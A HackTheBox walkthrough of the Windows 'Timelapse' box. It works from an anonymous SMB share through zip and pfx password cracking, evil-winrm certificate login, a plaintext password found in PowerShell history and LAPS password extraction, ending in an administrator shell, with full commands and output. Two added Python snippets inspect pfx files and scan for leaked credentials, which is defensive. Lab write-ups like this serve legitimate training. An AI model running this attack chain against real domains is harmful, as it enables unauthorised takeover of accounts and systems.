HackTheBox Timelapse Walkthrough

System: Windows
Topics: pfx file handling, LAPS

Start with a port scan.

~/D/t $auto_nmap.sh $IP
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-01-14 21:15:44Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2025-01-14T21:17:15+00:00; +7h44m19s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after:  2022-10-25T14:25:29
| MD5:   e233:a199:4504:0859:013f:b9c5:e4f6:91c3
|_SHA-1: 5861:acf7:76b8:703f:d01e:e25d:fc7c:9952:a447:7652
| tls-alpn:
|_  http/1.1
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49705/tcp open  msrpc             Microsoft Windows RPC
49737/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Add the domain name and the domain controller's hostname to /etc/hosts.

~/D/t $echo '10.10.11.152 dc01.timelapse.htb timelapse.htb' | sudo tee -a /etc/hosts
10.10.11.152 dc01.timelapse.htb timelapse.htb

A box like this with no HTTP entry point can usually only be approached through SMB.

~/D/t $crackmapexec smb $IP -u 'null' -p '' --shares
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\null:
SMB         10.10.11.152    445    DC01             [+] Enumerated shares
SMB         10.10.11.152    445    DC01             Share           Permissions     Remark
SMB         10.10.11.152    445    DC01             -----           -----------     ------
SMB         10.10.11.152    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.152    445    DC01             C$                              Default share
SMB         10.10.11.152    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.152    445    DC01             NETLOGON                        Logon server share
SMB         10.10.11.152    445    DC01             Shares          READ
SMB         10.10.11.152    445    DC01             SYSVOL                          Logon server share

Browse the Shares folder and download everything inside it.

~/D/t $smbclient //$IP/Shares -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Oct 25 17:39:15 2021
  ..                                  D        0  Mon Oct 25 17:39:15 2021
  Dev                                 D        0  Mon Oct 25 21:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 17:48:42 2021

                6367231 blocks of size 4096. 1288862 blocks available
smb: \> recurse ON
smb: \> prompt off
smb: \> mget *

The zip is password-protected; after cracking the password and extracting it, we get a pfx file.

~/D/t/D $zip2john winrm_backup.zip > winrm_backup.zip.hash
~/D/t/D $john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2025-01-14 14:59) 4.545g/s 15788Kp/s 15788Kc/s 15788KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Enumerate the domain user names.

~/D/t $netexec smb $IP -u 'anonymous' -p '' --rid-brute 10000 |grep SidTypeUser |awk '{print $6}' |cut -d '\' -f2 | tee names.txt

Administrator
Guest
krbtgt
DC01$
thecybergeek
payl0ad
legacyy
sinfulz
babywyrm
DB01$
WEB01$
DEV01$
svc_deploy
TRX

The pfx file we just extracted very likely belongs to one of these users, and judging by its filename, most likely to legacyy.
A pfx file always has a password, so crack it with john as well.

~/D/t/D $pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.pfx.hash

~/D/t/D $john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 SSE2 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)
1g 0:00:01:23 DONE (2025-01-14 22:55) 0.01197g/s 38683p/s 38683c/s 38683C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

What a pfx file may contain:

Private key: used for decryption or signing.
Public key certificate: used for authentication.
Possibly a certificate chain: establishes the trust relationship.

Extract the private key and the certificate chain.

~/D/t/D $openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
Enter Import Password:

~/D/t/D $openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem
Enter Import Password:
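As an added example (not from the original writeup), the same inspection done in Python with the cryptography library: it opens a .pfx with its password, reports whether the bundle carries a private key, extra chain certificates and a Client Authentication EKU (required for certificate-based WinRM logon), and checks whether a candidate password opens the bundle at all. The test bundle, the user name exampleuser and the password are constructed for the example.

```python
import datetime
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import pkcs12
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID


def describe_pfx(pfx_bytes: bytes, password: bytes) -> dict:
    """Open a .pfx with its password and summarise what the bundle holds."""
    key, cert, chain = pkcs12.load_key_and_certificates(pfx_bytes, password)
    try:
        eku = cert.extensions.get_extension_for_class(x509.ExtendedKeyUsage).value
        client_auth = ExtendedKeyUsageOID.CLIENT_AUTH in eku
    except x509.ExtensionNotFound:
        client_auth = False  # no EKU at all: not marked for client authentication
    return {
        "subject": cert.subject.rfc4514_string(),
        "has_private_key": key is not None,
        "key_bits": key.key_size if key is not None else 0,
        "chain_length": len(chain),   # additional CA certificates shipped in the bundle
        "client_auth": client_auth,   # needed for certificate-based WinRM logon
    }


def pfx_password_works(pfx_bytes: bytes, password: bytes) -> bool:
    """True if the password opens the bundle (MAC check and key decryption succeed)."""
    try:
        pkcs12.load_key_and_certificates(pfx_bytes, password)
        return True
    except ValueError:
        return False


def build_sample_pfx(password: bytes) -> bytes:
    """Constructed test bundle (not the box's legacyy_dev_auth.pfx): a self-signed
    client-authentication certificate for a made-up user, so this runs offline."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "exampleuser")])
    now = datetime.datetime.now(datetime.timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(name).issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now)
        .not_valid_after(now + datetime.timedelta(days=365))
        .add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CLIENT_AUTH]), critical=False)
        .sign(key, hashes.SHA256())
    )
    return pkcs12.serialize_key_and_certificates(
        b"sample", key, cert, None, serialization.BestAvailableEncryption(password))
```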

Now we can log in to a shell.

~/D/t/D $evil-winrm -i $IP -c cert.pem -k key.pem -S

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

Run winPEAS to gather information; note the PowerShell history file (easy to miss, so read the output carefully).

PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 434B

Looking at its contents, we find a password, which appears to be svc_deploy's.

*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
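
As an added example (not part of the original writeup), a small scanner a defender could run over PSReadLine ConsoleHost_history.txt files to find plaintext credentials of the kind shown above; the sample history, the user svc_example and the secrets in it are constructed.

```python
import re

# Each pattern names the secret in a group called "secret" so it can be redacted.
CREDENTIAL_PATTERNS = [
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>.+?)(?P=q).*-AsPlainText", re.I)),
    ("net use /user:",
     re.compile(r"\bnet\s+use\b.*\s(?P<secret>\S+)\s+/user:", re.I)),
    ("-Password/-p argument",
     re.compile(r"\s-(?:Password|p)\s+(?P<q>['\"]?)(?P<secret>[^'\"\s]+)(?P=q)", re.I)),
]


def redact(secret: str) -> str:
    """Keep the first two characters so a finding is reviewable without re-leaking it."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "*" * len(secret)


def scan_history(text: str) -> list:
    """Return one finding per matching line: (line number, pattern label, redacted secret)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in CREDENTIAL_PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append((lineno, label, redact(m.group("secret"))))
                break  # one finding per line is enough
    return findings


# Constructed sample in the style of the box's history file (not the real file).
SAMPLE_HISTORY = """whoami
ipconfig /all
$p = ConvertTo-SecureString 'Pa55w0rd!Example' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_example', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl
net use Z: \\\\fileserver\\share Sup3rSecret /user:corp\\svc_example
get-aduser -filter * -properties *
exit
"""

if __name__ == "__main__":
    for lineno, label, secret in scan_history(SAMPLE_HISTORY):
        print(f"line {lineno}: {label}: {secret}")
```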

Verify which account this password belongs to and what it grants: it can log in to SMB and LDAP.

~/D/t $netexec smb $IP -u names.txt -p 'E3R$Q62^12p7PLlC%KWaxuaV' --continue-on-success
...
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
...
~/D/t $check_auth.sh $IP -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Running: netexec smb 10.10.11.152 -u null -p null
SMB                      10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB                      10.10.11.152    445    DC01             [+] timelapse.htb\null:null (Guest)
----------------------------------------
Running: netexec winrm 10.10.11.152 -u null -p null
WINRM-SSL                10.10.11.152    5986   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:timelapse.htb)
WINRM-SSL                10.10.11.152    5986   DC01             [-] timelapse.htb\null:null
----------------------------------------
Running: netexec ldap 10.10.11.152 -u null -p null
/opt/check_auth.sh: line 57: warning: command substitution: ignored null byte in input
SMB                      10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP                     10.10.11.152    389    DC01             [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
LDAP                     10.10.11.152    389    DC01             [+] timelapse.htb\null:null

Collect BloodHound data.

~/D/t $netexec ldap $IP -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'  --bloodhound --collection All --dns-server $IP
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.152    389    DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LDAP        10.10.11.152    389    DC01             Resolved collection methods: acl, group, rdp, psremote, localadmin, session, trusts, objectprops, dcom, container
LDAP        10.10.11.152    389    DC01             Done in 00M 19S
LDAP        10.10.11.152    389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.152_2025-01-15_144347_bloodhound.zip

In BloodHound we find that the group svc_deploy belongs to can read LAPS passwords.

In a Windows environment, ms-Mcs-AdmPwd is an Active Directory (AD) attribute used to store a computer's local administrator password. It belongs to Microsoft's Local Administrator Password Solution (LAPS), a Microsoft tool that automatically manages the local administrator account passwords of computers in a domain.

Follow the hint, download the script, and run it.

~/D/t $pyLAPS.py --action get -d "timelapse.htb" -u "svc_deploy" -p 'E3R$Q62^12p7PLlC%KWaxuaV'
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_

[+] Extracting LAPS passwords of all computers ...
  | DC01$                : )H;z4dC4v[;)4d8Ggu$4k7&Z
[+] All done!

Verify that this password is the Administrator's.

~/D/t $netexec smb $IP -u names.txt -p ')H;z4dC4v[;)4d8Ggu$4k7&Z'
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\Administrator:)H;z4dC4v[;)4d8Ggu$4k7&Z (Pwn3d!)

Log in to a shell. DONE!

~/D/t $impacket-wmiexec   timelapse.htb/administrator:')H;z4dC4v[;)4d8Ggu$4k7&Z'@dc01.timelapse.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
timelapse\administrator
